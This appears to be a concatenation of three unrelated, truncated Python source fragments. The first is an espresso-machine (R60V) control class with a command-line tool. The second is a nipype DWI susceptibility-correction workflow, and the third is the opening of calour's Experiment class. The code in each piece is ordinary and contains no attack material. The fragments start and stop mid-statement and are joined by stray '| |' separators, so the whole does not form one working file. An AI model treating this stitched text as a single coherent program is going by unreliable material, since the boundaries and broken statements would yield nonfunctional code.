unit = self.temperatureUnit
if unit == 'Celsius':
self._check_range(x, self.__Steam_temp_C, 'Temperature ')
elif unit == 'Fahrenheit':
self._check_range(x, self.__Steam_temp_F, 'Temperature ')
else:
self._log.error('Temperature unit has a wrong state "{}"'.format(unit))
return
self._api.write(3, x)
steamTemperature = property(
fset=_set_steamTemperature,
fget=lambda self: self._api.read(3),
fdel=None,
doc='Temperature (in F or C) of steam boiler: 115...125 °C')
# BYTE 4: coffeePID # 4-5, 10-11, 16-17
coffeePID = property(
fset=None,
fget=lambda self: self._read_PID(4),
fdel=None,
doc='')
# BYTE 6: groupPID # 6-7, 12-13, 18-19
groupPID = property(
fset=None,
fget=lambda self: self._read_PID(6),
fdel=None,
doc='')
# BYTE 8: mysteryPID # 8-9, 14-15, 20-21
mysteryPID = property(
fset=None,
fget=lambda self: self._read_PID(8),
fdel=None,
doc='')
# BYTE 22: pressure profile A # 22-36
def _set_pressureA(self, profile):
self._check_profile(profile)
self._write_profile(22, profile)
pressureA = property(
fset=_set_pressureA,
fget=lambda self: self._read_profile(22),
fdel=None,
doc='Pressure profile A - 5 times [seconds, bars]')
# BYTE 38: pressure profile B # 38-52
def _set_pressureB(self, profile):
self._check_profile(profile)
self._write_profile(38, profile)
pressureB = property(
fset=_set_pressureB,
fget=lambda self: self._read_profile(38),
fdel=None,
doc='Pressure profile B - 5 times [seconds, bars]')
# BYTE 54: pressure profile C # 54-68
def _set_pressureC(self, profile):
self._check_profile(profile)
self._write_profile(54, profile)
pressureC = property(
fset=_set_pressureC,
fget=lambda self: self._read_profile(54),
fdel=None,
doc='Pressure profile C - 5 times [seconds, bars]')
# BYTE 70: water source
__WaterSource = ['PlumbedIn', 'Tank']
def _set_waterSource(self, x):
if x not in self.__WaterSource:
self._log.warning('"{}" is not valid. Choose one of: {}!'.format(x, self.__WaterSource))
else:
self._api.write(70, self.__WaterSource.index(x))
waterSource = property(
fset=_set_waterSource,
fget=lambda self: self.__WaterSource[self._api.read(70)],
fdel=None,
doc='Selected water source: "plumbed in" or "tank"')
# BYTE 71: active profile
__ActiveProfile = ['A', 'B', 'C']
def _set_activeProfile(self, x):
if x not in self.__ActiveProfile:
self._log.warning('"{}" is not valid. Choose one of: {}!'.format(x, self.__ActiveProfile))
else:
self._api.write(71, self.__ActiveProfile.index(x))
activeProfile = property(
fset=_set_activeProfile,
fget=lambda self: self.__ActiveProfile[self._api.read(71)],
fdel=None,
doc='Selected profile for next run.')
# BYTE 72: steam clean time
steamCleanTime = property(
fset=None,
fget=lambda self: self._api.read(72),
fdel=None,
doc='')
# BYTE 73: is service boiler on
def _set_isServiceBoilerOn(self, x):
if not isinstance(x, bool):
self._log.warning('"{}" is not valid. Choose a boolean!'.format(x))
else:
self._api.write(73, x)
isServiceBoilerOn = property(
fset=_set_isServiceBoilerOn,
fget=lambda self: self._api.read(73) == 1,
fdel=None,
doc='Status of steam (aka service) boiler: on/off')
# BYTE 74: is machine in standby
def _set_isMachineInStandby(self, x):
if not isinstance(x, bool):
self._log.warning('"{}" is not valid. Choose a boolean!'.format(x))
else:
self._api.write(74, x)
isMachineInStandby = property(
fset=_set_isMachineInStandby,
fget=lambda self: self._api.read(74) == 1,
fdel=None,
doc='Standby mode of R60V: on/off')
# BYTE 75: NOT TESTED coffee cycles subtotal # 75-76
coffeeCyclesSubtotal = property(
fset=None,
fget=lambda self: [self._api.read(75), self._api.read(76)],
fdel=None,
doc='')
# BYTE 77: NOT TESTED coffee cycles total # 77-80
coffeeCyclesTotal = property(
fset=None,
fget=lambda self: [self._api.read(idx) for idx in range(77, 81)],
fdel=None,
doc='')
# BYTE 81: NOT TESTED auto on time # 81-82
autoOnTime = property(
fset=None,
fget=lambda self: [self._api.read(81), self._api.read(82)],
fdel=None,
doc='')
# BYTE 83: NOT TESTED auto standby time # 83-84
autoStandbyTime = property(
fset=None,
fget=lambda self: [self._api.read(83), self._api.read(84)],
fdel=None,
doc='')
# BYTE 85: NOT TESTED auto skip day
autoSkipDay = property(
fset=None,
fget=lambda self: self._api.read(85),
fdel=None,
doc='')
def __init__(self, machine_ip='192.168.1.1', machine_port=1774):
# create logger
self._log = logging.getLogger('rocket.state')
# check if RocketEspresso SSID is available
if re.search('RocketEspresso', os.popen('iwlist wlan0 scan').read()) is not None:
self._log.debug('SSID "RocketEspresso" found')
else:
critical(self._log, 'SSID "RocketEspresso" not found')
# ip address from DHCP server of R60V?
if os.popen('ifconfig | grep "192.168.1."').read():
self._log.debug('ip address from DHCP server of R60V available')
else:
critical(self._log, 'no ip address from DHCP server of R60V available')
# create connection to machine
self._api = api(machine_ip=machine_ip, machine_port=machine_port)
def __del__(self):
self._log.info('run destructor')
self._api.close()
# ### helper functions ###
def _check_range(self, selected, min_max, pre):
if not(min_max[0] <= selected <= min_max[1]):
critical(self._log, '{}value "{}" is out of range [{} ... {}]!'.format(
pre, selected, min_max[0], min_max[1]))
def _check_profile(self, profile):
# set default values
err = []
bValid = True
# (kind of) protected MIN/MAX values
Pressure = [0, 14] # bars
Time = [0, 60] # seconds
# look at each of the 5 settings
for num in range(5):
# check temperature
self._check_range(profile[num][0], Time, 'Time ')
# check pressure
self._check_range(profile[num][1], Pressure, 'Pressure ')
def _read_profile(self, offset):
profile = np.array([
[self._api.read(offset + 0), self._api.read(offset + 10)],
[self._api.read(offset + 2), self._api.read(offset + 11)],
[self._api.read(offset + 4), self._api.read(offset + 12)],
[self._api.read(offset + 6), self._api.read(offset + 13)],
[self._api.read(offset + 8), self._api.read(offset + 14)]])
self._log.info('received profile (offset={}): {}'.format(offset, profile))
profile = profile / 10 # decisecond => second, decibar => bar
return profile
def _write_profile(self, offset, profile):
p = np.array(profile) * 10
self._api.write(offset + 0, p[0][0]), self._api.write(offset + 10, p[0][1])
self._api.write(offset + 2, p[1][0]), self._api.write(offset + 11, p[1][1])
self._api.write(offset + 4, p[2][0]), self._api.write(offset + 12, p[2][1])
self._api.write(offset + 6, p[3][0]), self._api.write(offset + 13, p[3][1])
self._api.write(offset + 8, p[4][0]), self._api.write(offset + 14, p[4][1])
def _read_PID(self, offset):
profile = np.array([
self._api.read(offset + 0),
self._api.read(offset + 6),
self._api.read(offset + 12)])
return profile
if __name__ == "__main__":
# create logger and set level
log = logging.getLogger('rocket.cli')
# create console handler with a higher log level
sh = logging.StreamHandler(stream=sys.stdout)
sh.setLevel(logging.INFO)
# create formatters and add them to the handlers
form_sh = logging.Formatter('%(name)s - %(levelname)s - %(message)s')
sh.setFormatter(form_sh)
# add the handlers to the logger
log.addHandler(sh)
parser = argparse.ArgumentParser(
description='Command-line tool to read and write data from R60V.',
epilog="""
List of all R60V properties and their possible values ([] means: not writable):
* activeProfile [A/B/C]
* autoOnTime []
* autoSkipDay []
* autoStandbyTime []
* coffeeCyclesSubtotal []
* coffeeCyclesTotal []
* coffeePID []
* coffeeTemperature [105], e.g. 85...115 C or 185...239 F
* groupPID []
* isMachineInStandby [True/False]
* isServiceBoilerOn [True/False]
* language [English/German/French/Italian]
* mysteryPID []
* pressureA default: [[ 6, 4], [18, 9], [6, 5], [0, 0], [0, 0]]
* pressureB default: [[20, 9], [10, 5], [0, 0], [0, 0], [0, 0]]
* pressureC default: [[ 8, 4], [22, 9], [0, 0], [0, 0], [0, 0]]
* steamCleanTime []
* steamTemperature [124], e.g. 115...125 C or 239...257 F
* temperatureUnit [Celsius/Fahrenheit]
* waterSource [PlumbedIn/Tank]
All pressure profiles contain 5 steps with [0...60 seconds, 0...14 bars] in decisecond/-bar precision.
""",
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('-da', | |
## \author <NAME>
##
## This workflow corrects the succeptiblity artifacts of the input DWI data,
## and aligns that to corresponding t2 image space
## Important outputs: CorrectedDWI_in_T2Space, DWIBrainMask
"""
CorrectionWorkflow.py
============================
Description:
The purpose of this is to...
Author:
Usage:
"""
import nipype
import nipype.interfaces.io as nio # Data i/oS
import nipype.pipeline.engine as pe # pypeline engine
from nipype.interfaces import ants
from nipype.interfaces.base import (
CommandLine,
CommandLineInputSpec,
TraitedSpec,
File,
Directory,
)
from nipype.interfaces.base import traits, isdefined, BaseInterface
from nipype.interfaces.semtools import *
from nipype.interfaces.utility import Merge, Split, Function, Rename, IdentityInterface
from utilities.misc import common_ants_registration_settings
def create_correction_workflow(WFname):
"""
This Function takes in...
:param WFname:
:return: CorrectionWF
"""
###### UTILITY FUNCTIONS #######
# \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
# remove the skull from the T2 volume
def extract_brain_from_head(RawScan, BrainLabels):
"""
This function will remove the skull from the T2 volume
:param Rawscan:
:param BrainLabels:
:return:
"""
import os
import SimpleITK as sitk
# Remove skull from the head scan
assert os.path.exists(RawScan), "File not found: %s" % RawScan
assert os.path.exists(BrainLabels), "File not found: %s" % BrainLabels
headImage = sitk.ReadImage(RawScan)
labelsMap = sitk.ReadImage(BrainLabels)
label_mask = labelsMap > 0
brainImage = sitk.Cast(headImage, sitk.sitkInt16) * sitk.Cast(
label_mask, sitk.sitkInt16
)
outputVolume = os.path.realpath("T2Stripped.nrrd")
sitk.WriteImage(brainImage, outputVolume)
return outputVolume
def make_resampled_in_file_list(inputT2, inputLabelMap):
"""
This function..
:param inputT2:
:param inputLabelMap:
:return:
"""
imagesList = [inputT2, inputLabelMap]
return imagesList
# This function helps to pick desirable output from the output list
def pick_from_file(inlist, item):
"""
This function will
:param inlist:
:param item:
:return:
"""
return inlist[item]
# Create registration mask for ANTs from resampled label map image
def create_ants_registration_mask(brainMask):
"""
This function will
:param brainmask:
:return:
"""
import os
import SimpleITK as sitk
assert os.path.exists(brainMask), "File not found: %s" % brainMask
labelsMap = sitk.ReadImage(brainMask)
label_mask = labelsMap > 0
# dilate the label mask
dilateFilter = sitk.BinaryDilateImageFilter()
dilateFilter.SetKernelRadius(12)
dilated_mask = dilateFilter.Execute(label_mask)
regMask = dilated_mask
registrationMask = os.path.realpath("registrationMask.nrrd")
sitk.WriteImage(regMask, registrationMask)
return registrationMask
# Save direction cosine for the input volume
def save_direction_cosine_to_matrix(inputVolume):
"""
This function will return the direction cosine for the input volume
:param inputVolume:
:return:
"""
import os
import SimpleITK as sitk
assert os.path.exists(inputVolume), "File not found: %s" % inputVolume
t2 = sitk.ReadImage(inputVolume)
directionCosine = t2.GetDirection()
return directionCosine
def make_force_dc_file_list(inputB0, inputT2, inputLabelMap):
"""
This function will
:param inputB0:
:param inputT2:
:param inputLabelMap:
:return:
"""
import os
assert os.path.exists(inputB0), "File not found: %s" % inputB0
assert os.path.exists(inputT2), "File not found: %s" % inputT2
assert os.path.exists(inputLabelMap), "File not found: %s" % inputLabelMap
imagesList = [inputB0, inputT2, inputLabelMap]
return imagesList
# Force DC to ID
def force_dc_to_id(inputVolume):
"""
This function will force DC to ID
:param inputVolume:
:return:
"""
import os
import SimpleITK as sitk
inImage = sitk.ReadImage(inputVolume)
inImage.SetDirection((1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0))
outputVolume = os.path.realpath("IDDC_" + os.path.basename(inputVolume))
sitk.WriteImage(inImage, outputVolume)
return outputVolume
def restore_dc_from_saved_matrix(inputVolume, inputDirectionCosine):
"""
This function will
:param inputVolume:
:param inputDirectionCosine:
:return:
"""
import os
import SimpleITK as sitk
inImage = sitk.ReadImage(inputVolume)
inImage.SetDirection(inputDirectionCosine)
outputVolume = os.path.realpath("CorrectedDWI.nrrd")
sitk.WriteImage(inImage, outputVolume)
return outputVolume
def get_rigid_transform_inverse(inputTransform):
"""
This function will
:param inputTransform:
:return:
"""
import os
import SimpleITK as sitk
inputTx = sitk.ReadTransform(inputTransform)
versorRigidTx = sitk.VersorRigid3DTransform()
versorRigidTx.SetFixedParameters(inputTx.GetFixedParameters())
versorRigidTx.SetParameters(inputTx.GetParameters())
invTx = versorRigidTx.GetInverse()
inverseTransform = os.path.realpath(
"Inverse_" + os.path.basename(inputTransform)
)
sitk.WriteTransform(invTx, inverseTransform)
return inverseTransform
#################################
# \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
CorrectionWF = pe.Workflow(name=WFname)
inputsSpec = pe.Node(
interface=IdentityInterface(fields=["T2Volume", "DWIVolume", "LabelMapVolume"]),
name="inputsSpec",
)
outputsSpec = pe.Node(
interface=IdentityInterface(
fields=["CorrectedDWI", "CorrectedDWI_in_T2Space", "DWIBrainMask"]
),
name="outputsSpec",
)
# Step0: remove the skull from the T2 volume
ExtractBRAINFromHeadNode = pe.Node(
interface=Function(
function=extract_brain_from_head,
input_names=["RawScan", "BrainLabels"],
output_names=["outputVolume"],
),
name="extract_brain_from_head",
)
CorrectionWF.connect(inputsSpec, "T2Volume", ExtractBRAINFromHeadNode, "RawScan")
CorrectionWF.connect(
inputsSpec, "LabelMapVolume", ExtractBRAINFromHeadNode, "BrainLabels"
)
# Step1: extract B0 from DWI volume
EXTRACT_B0 = pe.Node(interface=extractNrrdVectorIndex(), name="EXTRACT_B0")
EXTRACT_B0.inputs.vectorIndex = 0
EXTRACT_B0.inputs.outputVolume = "B0_Image.nrrd"
CorrectionWF.connect(inputsSpec, "DWIVolume", EXTRACT_B0, "inputVolume")
# Step2: Register T2 to B0 space using BRAINSFit
BFit_T2toB0 = pe.Node(interface=BRAINSFit(), name="BFit_T2toB0")
BFit_T2toB0.inputs.costMetric = "MMI"
BFit_T2toB0.inputs.numberOfSamples = 100000
BFit_T2toB0.inputs.numberOfIterations = [1500]
BFit_T2toB0.inputs.numberOfHistogramBins = 50
BFit_T2toB0.inputs.maximumStepLength = 0.2
BFit_T2toB0.inputs.minimumStepLength = [0.00005]
BFit_T2toB0.inputs.useRigid = True
BFit_T2toB0.inputs.useAffine = True
BFit_T2toB0.inputs.maskInferiorCutOffFromCenter = 65
BFit_T2toB0.inputs.maskProcessingMode = "ROIAUTO"
BFit_T2toB0.inputs.ROIAutoDilateSize = 13
BFit_T2toB0.inputs.backgroundFillValue = 0.0
BFit_T2toB0.inputs.initializeTransformMode = "useCenterOfHeadAlign"
BFit_T2toB0.inputs.strippedOutputTransform = "T2ToB0_RigidTransform.h5"
BFit_T2toB0.inputs.writeOutputTransformInFloat = True
CorrectionWF.connect(EXTRACT_B0, "outputVolume", BFit_T2toB0, "fixedVolume")
CorrectionWF.connect(
ExtractBRAINFromHeadNode, "outputVolume", BFit_T2toB0, "movingVolume"
)
# Step3: Use T_rigid to "resample" T2 and label map images to B0 image space
MakeResamplerInFilesListNode = pe.Node(
Function(
function=make_resampled_in_file_list,
input_names=["inputT2", "inputLabelMap"],
output_names=["imagesList"],
),
name="MakeResamplerInFilesListNode",
)
CorrectionWF.connect(
[
(
ExtractBRAINFromHeadNode,
MakeResamplerInFilesListNode,
[("outputVolume", "inputT2")],
),
(
inputsSpec,
MakeResamplerInFilesListNode,
[("LabelMapVolume", "inputLabelMap")],
),
]
)
ResampleToB0Space = pe.MapNode(
interface=BRAINSResample(),
name="ResampleToB0Space",
iterfield=["inputVolume", "pixelType", "outputVolume"],
)
ResampleToB0Space.inputs.interpolationMode = "Linear"
ResampleToB0Space.inputs.outputVolume = ["T2toB0.nrrd", "BRAINMaskToB0.nrrd"]
ResampleToB0Space.inputs.pixelType = ["ushort", "binary"]
CorrectionWF.connect(
BFit_T2toB0, "strippedOutputTransform", ResampleToB0Space, "warpTransform"
)
CorrectionWF.connect(
EXTRACT_B0, "outputVolume", ResampleToB0Space, "referenceVolume"
)
CorrectionWF.connect(
MakeResamplerInFilesListNode, "imagesList", ResampleToB0Space, "inputVolume"
)
# Step4: Create registration mask from resampled label map image
CreateRegistrationMask = pe.Node(
interface=Function(
function=create_ants_registration_mask,
input_names=["brainMask"],
output_names=["registrationMask"],
),
name="create_ants_registration_mask",
)
CorrectionWF.connect(
ResampleToB0Space,
("outputVolume", pick_from_file, 1),
CreateRegistrationMask,
"brainMask",
)
# Step5: Save direction cosine for the resampled T2 image
SaveDirectionCosineToMatrixNode = pe.Node(
interface=Function(
function=save_direction_cosine_to_matrix,
input_names=["inputVolume"],
output_names=["directionCosine"],
),
name="save_direction_cosine_to_matrix",
)
CorrectionWF.connect(
ResampleToB0Space,
("outputVolume", pick_from_file, 0),
SaveDirectionCosineToMatrixNode,
"inputVolume",
)
# Step6: Force DC to ID
MakeForceDCFilesListNode = pe.Node(
Function(
function=make_force_dc_file_list,
input_names=["inputB0", "inputT2", "inputLabelMap"],
output_names=["imagesList"],
),
name="MakeForceDCFilesListNode",
)
CorrectionWF.connect(
[
(EXTRACT_B0, MakeForceDCFilesListNode, [("outputVolume", "inputB0")]),
(
ResampleToB0Space,
MakeForceDCFilesListNode,
[(("outputVolume", pick_from_file, 0), "inputT2")],
),
(
CreateRegistrationMask,
MakeForceDCFilesListNode,
[("registrationMask", "inputLabelMap")],
),
]
)
ForceDCtoIDNode = pe.MapNode(
interface=Function(
function=force_dc_to_id,
input_names=["inputVolume"],
output_names=["outputVolume"],
),
name="force_dc_to_id",
iterfield=["inputVolume"],
)
CorrectionWF.connect(
MakeForceDCFilesListNode, "imagesList", ForceDCtoIDNode, "inputVolume"
)
# Step7: Run antsRegistration in one direction
antsReg_B0ToTransformedT2 = pe.Node(
interface=ants.Registration(), name="antsReg_B0ToTransformedT2"
)
antsReg_B0ToTransformedT2.inputs.interpolation = "Linear"
antsReg_B0ToTransformedT2.inputs.dimension = 3
antsReg_B0ToTransformedT2.inputs.transforms = ["SyN"]
antsReg_B0ToTransformedT2.inputs.transform_parameters = [(0.25, 3.0, 0.0)]
antsReg_B0ToTransformedT2.inputs.metric = ["MI"]
antsReg_B0ToTransformedT2.inputs.sampling_strategy = [None]
antsReg_B0ToTransformedT2.inputs.sampling_percentage = [1.0]
antsReg_B0ToTransformedT2.inputs.metric_weight = [1.0]
antsReg_B0ToTransformedT2.inputs.radius_or_number_of_bins = [32]
antsReg_B0ToTransformedT2.inputs.number_of_iterations = [[70, 50, 40]]
antsReg_B0ToTransformedT2.inputs.convergence_threshold = [1e-6]
antsReg_B0ToTransformedT2.inputs.convergence_window_size = [10]
antsReg_B0ToTransformedT2.inputs.use_histogram_matching = [True]
antsReg_B0ToTransformedT2.inputs.shrink_factors = [[3, 2, 1]]
antsReg_B0ToTransformedT2.inputs.smoothing_sigmas = [[2, 1, 0]]
antsReg_B0ToTransformedT2.inputs.sigma_units = ["vox"]
antsReg_B0ToTransformedT2.inputs.use_estimate_learning_rate_once = [False]
antsReg_B0ToTransformedT2.inputs.write_composite_transform = True
antsReg_B0ToTransformedT2.inputs.collapse_output_transforms = False
antsReg_B0ToTransformedT2.inputs.initialize_transforms_per_stage = False
antsReg_B0ToTransformedT2.inputs.output_transform_prefix = "Tsyn"
antsReg_B0ToTransformedT2.inputs.winsorize_lower_quantile = 0.01
antsReg_B0ToTransformedT2.inputs.winsorize_upper_quantile = 0.99
antsReg_B0ToTransformedT2.inputs.float = True
antsReg_B0ToTransformedT2.inputs.num_threads = -1
antsReg_B0ToTransformedT2.inputs.args = "--restrict-deformation 0x1x0"
CorrectionWF.connect(
ForceDCtoIDNode,
("outputVolume", pick_from_file, 1),
antsReg_B0ToTransformedT2,
"fixed_image",
)
CorrectionWF.connect(
ForceDCtoIDNode,
("outputVolume", pick_from_file, 2),
antsReg_B0ToTransformedT2,
"fixed_image_masks",
)
CorrectionWF.connect(
ForceDCtoIDNode,
("outputVolume", pick_from_file, 0),
antsReg_B0ToTransformedT2,
"moving_image",
)
# Step8: Now, all necessary transforms are acquired. It's a time to
# transform input DWI image into T2 image space
# {DWI} --> force_dc_to_id --> gtractResampleDWIInPlace(using SyN transfrom)
# --> Restore DirectionCosine From Saved Matrix --> gtractResampleDWIInPlace(inverse of T_rigid from BFit)
# --> {CorrectedDW_in_T2Space}
DWI_ForceDCtoIDNode = pe.Node(
interface=Function(
function=force_dc_to_id,
input_names=["inputVolume"],
output_names=["outputVolume"],
),
name="DWI_ForceDCtoIDNode",
)
CorrectionWF.connect(inputsSpec, "DWIVolume", DWI_ForceDCtoIDNode, "inputVolume")
gtractResampleDWI_SyN = pe.Node(
interface=gtractResampleDWIInPlace(), name="gtractResampleDWI_SyN"
)
CorrectionWF.connect(
DWI_ForceDCtoIDNode, "outputVolume", gtractResampleDWI_SyN, "inputVolume"
)
CorrectionWF.connect(
antsReg_B0ToTransformedT2,
"composite_transform",
gtractResampleDWI_SyN,
"warpDWITransform",
)
CorrectionWF.connect(
ForceDCtoIDNode,
("outputVolume", pick_from_file, 1),
gtractResampleDWI_SyN,
"referenceVolume",
) # fixed image of antsRegistration
gtractResampleDWI_SyN.inputs.outputVolume = "IDDC_correctedDWI.nrrd"
RestoreDCFromSavedMatrixNode = pe.Node(
interface=Function(
function=restore_dc_from_saved_matrix,
input_names=["inputVolume", "inputDirectionCosine"],
output_names=["outputVolume"],
),
name="restore_dc_from_saved_matrix",
)
CorrectionWF.connect(
gtractResampleDWI_SyN,
"outputVolume",
RestoreDCFromSavedMatrixNode,
"inputVolume",
)
CorrectionWF.connect(
SaveDirectionCosineToMatrixNode,
"directionCosine",
RestoreDCFromSavedMatrixNode,
"inputDirectionCosine",
)
CorrectionWF.connect(
RestoreDCFromSavedMatrixNode, "outputVolume", outputsSpec, "CorrectedDWI"
)
GetRigidTransformInverseNode = pe.Node(
interface=Function(
function=get_rigid_transform_inverse,
input_names=["inputTransform"],
output_names=["inverseTransform"],
),
name="get_rigid_transform_inverse",
)
CorrectionWF.connect(
BFit_T2toB0,
"strippedOutputTransform",
GetRigidTransformInverseNode,
"inputTransform",
)
gtractResampleDWIInPlace_Trigid = pe.Node(
interface=gtractResampleDWIInPlace(), name="gtractResampleDWIInPlace_Trigid"
)
CorrectionWF.connect(
RestoreDCFromSavedMatrixNode,
"outputVolume",
gtractResampleDWIInPlace_Trigid,
"inputVolume",
)
CorrectionWF.connect(
GetRigidTransformInverseNode,
"inverseTransform",
gtractResampleDWIInPlace_Trigid,
"inputTransform",
) # Inverse of rigid transform from BFit
gtractResampleDWIInPlace_Trigid.inputs.outputVolume = (
"CorrectedDWI_in_T2Space_estimate.nrrd"
)
gtractResampleDWIInPlace_Trigid.inputs.outputResampledB0 = (
"CorrectedDWI_in_T2Space_estimate_B0.nrrd"
)
# Setp9: An extra registration step to tune the alignment between the CorrecetedDWI_in_T2Space image and T2 image.
BFit_TuneRegistration = pe.Node(interface=BRAINSFit(), name="BFit_TuneRegistration")
BFit_TuneRegistration.inputs.costMetric = "MMI"
BFit_TuneRegistration.inputs.numberOfSamples = 100000
BFit_TuneRegistration.inputs.numberOfIterations = [1500]
BFit_TuneRegistration.inputs.numberOfHistogramBins = 50
BFit_TuneRegistration.inputs.maximumStepLength = 0.2
BFit_TuneRegistration.inputs.minimumStepLength = [0.00005]
BFit_TuneRegistration.inputs.useRigid = True
BFit_TuneRegistration.inputs.useAffine = True
BFit_TuneRegistration.inputs.maskInferiorCutOffFromCenter = 65
BFit_TuneRegistration.inputs.maskProcessingMode = "ROIAUTO"
BFit_TuneRegistration.inputs.ROIAutoDilateSize = 13
BFit_TuneRegistration.inputs.backgroundFillValue = 0.0
BFit_TuneRegistration.inputs.initializeTransformMode = "useCenterOfHeadAlign"
BFit_TuneRegistration.inputs.strippedOutputTransform = (
"CorrectedB0inT2Space_to_T2_RigidTransform.h5"
)
BFit_TuneRegistration.inputs.writeOutputTransformInFloat = True
CorrectionWF.connect(
ExtractBRAINFromHeadNode, "outputVolume", BFit_TuneRegistration, "fixedVolume"
) # T2 brain volume
CorrectionWF.connect(
gtractResampleDWIInPlace_Trigid,
"outputResampledB0",
BFit_TuneRegistration,
"movingVolume",
) # CorrectedB0_in_T2Space
gtractResampleDWIInPlace_TuneRigidTx = pe.Node(
interface=gtractResampleDWIInPlace(),
name="gtractResampleDWIInPlace_TuneRigidTx",
)
CorrectionWF.connect(
gtractResampleDWIInPlace_Trigid,
"outputVolume",
gtractResampleDWIInPlace_TuneRigidTx,
"inputVolume",
)
CorrectionWF.connect(
BFit_TuneRegistration,
"strippedOutputTransform",
gtractResampleDWIInPlace_TuneRigidTx,
"inputTransform",
)
gtractResampleDWIInPlace_TuneRigidTx.inputs.outputVolume = (
"CorrectedDWI_in_T2Space.nrrd"
)
gtractResampleDWIInPlace_TuneRigidTx.inputs.outputResampledB0 = (
"CorrectedDWI_in_T2Space_B0.nrrd"
)
# Finally we pass the outputs of the gtractResampleDWIInPlace_TuneRigidTx to the outputsSpec
CorrectionWF.connect(
gtractResampleDWIInPlace_TuneRigidTx,
"outputVolume",
outputsSpec,
"CorrectedDWI_in_T2Space",
)
# Step10: Create brain mask from the input labelmap
DWIBRAINMASK = pe.Node(interface=BRAINSResample(), name="DWIBRAINMASK")
DWIBRAINMASK.inputs.interpolationMode = "Linear"
DWIBRAINMASK.inputs.outputVolume = | |
<gh_stars>0
'''
experiment (:mod:`calour.experiment`)
=====================================
.. currentmodule:: calour.experiment
Classes
^^^^^^^
.. autosummary::
:toctree: generated
Experiment
'''
# ----------------------------------------------------------------------------
# Copyright (c) 2016--, Calour development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from logging import getLogger
from copy import deepcopy, copy
from functools import wraps
import pandas as pd
import numpy as np
import scipy.sparse
logger = getLogger(__name__)
class Experiment:
'''This class contains the data for a experiment or a meta experiment.
The data set includes a data table (otu table, gene table,
metabolomic table, or all those tables combined), a sample
metadata table, and a feature metadata.
Parameters
----------
data : numpy.ndarray or scipy.sparse.csr_matrix
The abundance table for OTUs, metabolites, genes, etc. Samples
are in row and features in column
sample_metadata : pandas.DataFrame
The metadata on the samples
feature_metadata : pandas.DataFrame
The metadata on the features
description : str
name of experiment
sparse : bool
store the data array in :class:`scipy.sparse.csr_matrix`
or :class:`numpy.ndarray`
Attributes
----------
data : numpy.ndarray or scipy.sparse.csr_matrix
The abundance table for OTUs, metabolites, genes, etc. Samples
are in row and features in column
sample_metadata : pandas.DataFrame
The metadata on the samples
feature_metadata : pandas.DataFrame
The metadata on the features
exp_metadata : dict
metadata about the experiment (data md5, filenames, etc.)
shape : tuple of (int, int)
the dimension of data
sparse : bool
store the data array in :class:`scipy.sparse.csr_matrix`
or :class:`numpy.ndarray`
normalized : int
the normalization factor. it is zero if not normalized
description : str
name of the experiment
See Also
--------
AmpliconExperiment
'''
def __init__(self, data, sample_metadata, feature_metadata=None,
exp_metadata={}, description='', sparse=True):
self.data = data
self.sample_metadata = sample_metadata
self.feature_metadata = feature_metadata
self.exp_metadata = exp_metadata
self.description = description
self.normalized = 0
# the function calling history list
self._call_history = []
# whether to log to history
self._log = True
# flag if data array is sparse (True) or dense (False)
self.sparse = sparse
# the default databases to use for feature information
self.heatmap_databases = ()
@property
def sparse(self):
return scipy.sparse.issparse(self.data)
@sparse.setter
def sparse(self, sparse):
if sparse is True and not scipy.sparse.issparse(self.data):
self.data = scipy.sparse.csr_matrix(self.data)
elif sparse is False and scipy.sparse.issparse(self.data):
self.data = self.data.toarray()
def __repr__(self):
'''Return a string representation of this object.
The form is: class (description) with X samples, Y features
'''
l1 = self.__class__.__name__
if self.description:
l1 += ' ("%s")' % self.description
l1 += ' with %d samples, %d features' % self.data.shape
return l1
def __eq__(self, other):
'''Check equality.
It compares ``data``, ``sample_metadata``, and
``feature_metadata`` attributes. to check sparsity and do
the conversion if needed first.
'''
if self.sparse is True:
data = self.data.toarray()
else:
data = self.data
if other.sparse is True:
other_data = other.data.toarray()
else:
other_data = other.data
return (np.array_equal(data, other_data) and
pd.DataFrame.equals(self.feature_metadata, other.feature_metadata) and
pd.DataFrame.equals(self.sample_metadata, other.sample_metadata))
def __ne__(self, other):
return not (self == other)
def __getitem__(self, pos):
'''Get the abundance at (sampleid, featureid)
Parameters
----------
pos : tuple of (str, str)
the SampleID, FeatureID
Returns
-------
float
The abundance of feature ID in sample ID
'''
if not isinstance(pos, tuple) or len(pos) != 2:
raise SyntaxError('Must supply sample ID, feature ID')
sample = pos[0]
feature = pos[1]
if isinstance(sample, slice):
sample_pos = sample
else:
try:
sample_pos = self.sample_metadata.index.get_loc(sample)
except KeyError:
raise KeyError('SampleID %s not in experiment samples' % sample)
if isinstance(feature, slice):
feature_pos = feature
else:
try:
feature_pos = self.feature_metadata.index.get_loc(feature)
except KeyError:
raise KeyError('FeatureID %s not in experiment features' % feature)
if self.sparse:
dat = self.get_data(sparse=False)
else:
dat = self.get_data()
return dat[sample_pos, feature_pos]
def copy(self):
'''Copy the object (deeply).
It calls :func:`Experiment.__deepcopy__` to make copy.
Returns
-------
Experiment
'''
return deepcopy(self)
def __deepcopy__(self, memo):
'''Implement the deepcopy since pandas has problem deepcopy empty dataframe
When using the default deepcopy on an empty dataframe (columns but no rows), we get an error.
This happens when dataframe has 0 rows in pandas 0.19.2 np112py35_1.
So we manually use copy instead of deepcopy for empty dataframes
'''
cls = self.__class__
result = cls.__new__(cls)
memo[id(self)] = result
for k, v in self.__dict__.items():
try:
setattr(result, k, deepcopy(v, memo))
except:
logger.debug('Failed to copy attribute %r, doing shallow copy on it' % k)
setattr(result, k, copy(v))
memo[id(k)] = v
return result
@staticmethod
def _record_sig(func):
'''Record the function calls to history.
Note this requires the function decorated to return an
:class:`.Experiment` object.
'''
fn = func.__qualname__
@wraps(func)
def inner(*args, **kwargs):
# this extra code here is to prevent recording func call
# if the method is called inside another method.
exp = args[0]
log = exp._log
try:
logger.debug('Run func {}'.format(fn))
new_exp = func(*args, **kwargs)
if exp._log is True:
# do not use `'%r' % i` because it causes error when i is a tuple
param = ['{!r}'.format(i) for i in args[1:]] + ['{0!s}={1!r}'.format(k, v) for k, v in kwargs.items()]
param = ', '.join(param)
new_exp._call_history.append('{0}({1})'.format(fn, param))
exp._log = False
